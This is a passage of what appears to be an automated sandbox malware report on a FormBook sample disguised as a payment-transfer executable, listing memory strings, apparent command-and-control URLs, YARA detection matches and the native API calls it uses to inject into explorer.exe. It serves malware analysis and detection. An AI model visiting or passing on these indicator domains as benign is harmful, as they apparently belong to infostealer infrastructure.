          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.com/blr/www.carbeloy.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237111867.0000000000DEB000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          .NET source code contains very large strings
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, LogIn.cs, Long String: Length: 13656
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs, Long String: Length: 13656
          Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs, Long String: Length: 13656
          Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, LogIn.cs, Long String: Length: 13656
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, LogIn.cs, Long String: Length: 13656
          Initial sample is a PE file and has a suspicious name
          Source: initial sample, Static PE information: Filename: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419D60 NtCreateFile,4_2_00419D60
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419E10 NtReadFile,4_2_00419E10
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419E90 NtClose,4_2_00419E90
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419F40 NtAllocateVirtualMemory,4_2_00419F40
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419E8C NtClose,4_2_00419E8C
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419F3A NtAllocateVirtualMemory,4_2_00419F3A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_01029910
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010299A0 NtCreateSection,LdrInitializeThunk,4_2_010299A0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029840 NtDelayExecution,LdrInitializeThunk,4_2_01029840
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,4_2_01029860
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_010298F0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_01029A00
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A20 NtResumeThread,LdrInitializeThunk,4_2_01029A20
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A50 NtCreateFile,LdrInitializeThunk,4_2_01029A50
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029540 NtReadFile,LdrInitializeThunk,4_2_01029540
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010295D0 NtClose,LdrInitializeThunk,4_2_010295D0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029710 NtQueryInformationToken,LdrInitializeThunk,4_2_01029710
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029780 NtMapViewOfSection,LdrInitializeThunk,4_2_01029780
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_010297A0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_01029660
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_010296E0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029950 NtQueueApcThread,4_2_01029950
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010299D0 NtCreateProcessEx,4_2_010299D0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029820 NtEnumerateKey,4_2_01029820
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102B040 NtSuspendThread,4_2_0102B040
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010298A0 NtWriteVirtualMemory,4_2_010298A0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029B00 NtSetValueKey,4_2_01029B00
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102A3B0 NtGetContextThread,4_2_0102A3B0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A10 NtQuerySection,4_2_01029A10
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029A80 NtOpenDirectoryObject,4_2_01029A80
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029520 NtWaitForSingleObject,4_2_01029520
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102AD30 NtSetContextThread,4_2_0102AD30
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029560 NtWriteFile,4_2_01029560
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010295F0 NtQueryInformationFile,4_2_010295F0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102A710 NtOpenProcessToken,4_2_0102A710
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029730 NtQueryVirtualMemory,4_2_01029730
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029760 NtOpenProcess,4_2_01029760
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029770 NtSetInformationFile,4_2_01029770
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102A770 NtOpenThread,4_2_0102A770
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029FE0 NtCreateMutant,4_2_01029FE0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029610 NtEnumerateValueKey,4_2_01029610
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029650 NtQueryValueKey,4_2_01029650
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01029670 NtQueryInformationProcess,4_2_01029670
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010296D0 NtCreateKey,4_2_010296D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C695D0 NtClose,LdrInitializeThunk,9_2_04C695D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69540 NtReadFile,LdrInitializeThunk,9_2_04C69540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C696D0 NtCreateKey,LdrInitializeThunk,9_2_04C696D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C696E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04C696E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69650 NtQueryValueKey,LdrInitializeThunk,9_2_04C69650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04C69660
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69FE0 NtCreateMutant,LdrInitializeThunk,9_2_04C69FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69780 NtMapViewOfSection,LdrInitializeThunk,9_2_04C69780
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69710 NtQueryInformationToken,LdrInitializeThunk,9_2_04C69710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69840 NtDelayExecution,LdrInitializeThunk,9_2_04C69840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69860 NtQuerySystemInformation,LdrInitializeThunk,9_2_04C69860
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C699A0 NtCreateSection,LdrInitializeThunk,9_2_04C699A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_04C69910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A50 NtCreateFile,LdrInitializeThunk,9_2_04C69A50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C695F0 NtQueryInformationFile,9_2_04C695F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69560 NtWriteFile,9_2_04C69560
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69520 NtWaitForSingleObject,9_2_04C69520
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6AD30 NtSetContextThread,9_2_04C6AD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69670 NtQueryInformationProcess,9_2_04C69670
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69610 NtEnumerateValueKey,9_2_04C69610
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C697A0 NtUnmapViewOfSection,9_2_04C697A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69760 NtOpenProcess,9_2_04C69760
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6A770 NtOpenThread,9_2_04C6A770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69770 NtSetInformationFile,9_2_04C69770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6A710 NtOpenProcessToken,9_2_04C6A710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69730 NtQueryVirtualMemory,9_2_04C69730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C698F0 NtReadVirtualMemory,9_2_04C698F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C698A0 NtWriteVirtualMemory,9_2_04C698A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6B040 NtSuspendThread,9_2_04C6B040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69820 NtEnumerateKey,9_2_04C69820
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C699D0 NtCreateProcessEx,9_2_04C699D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69950 NtQueueApcThread,9_2_04C69950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A80 NtOpenDirectoryObject,9_2_04C69A80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A00 NtProtectVirtualMemory,9_2_04C69A00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A10 NtQuerySection,9_2_04C69A10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69A20 NtResumeThread,9_2_04C69A20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C6A3B0 NtGetContextThread,9_2_04C6A3B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C69B00 NtSetValueKey,9_2_04C69B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9F40 NtAllocateVirtualMemory,9_2_030A9F40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9E10 NtReadFile,9_2_030A9E10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9E90 NtClose,9_2_030A9E90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9D60 NtCreateFile,9_2_030A9D60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9F3A NtAllocateVirtualMemory,9_2_030A9F3A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9E8C NtClose,9_2_030A9E8C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04C2B150 appears 35 times
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: String function: 00FEB150 appears 35 times
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237111867.0000000000DEB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.236125503.00000000006C1000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.243377494.0000000008A10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.243638026.0000000008BE0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.274332960.0000000000581000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275294499.000000000126F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.276581329.0000000002ECE000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeBinary or memory string: OriginalFilenameRegistryTimeZoneInformation.exe6 vs Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
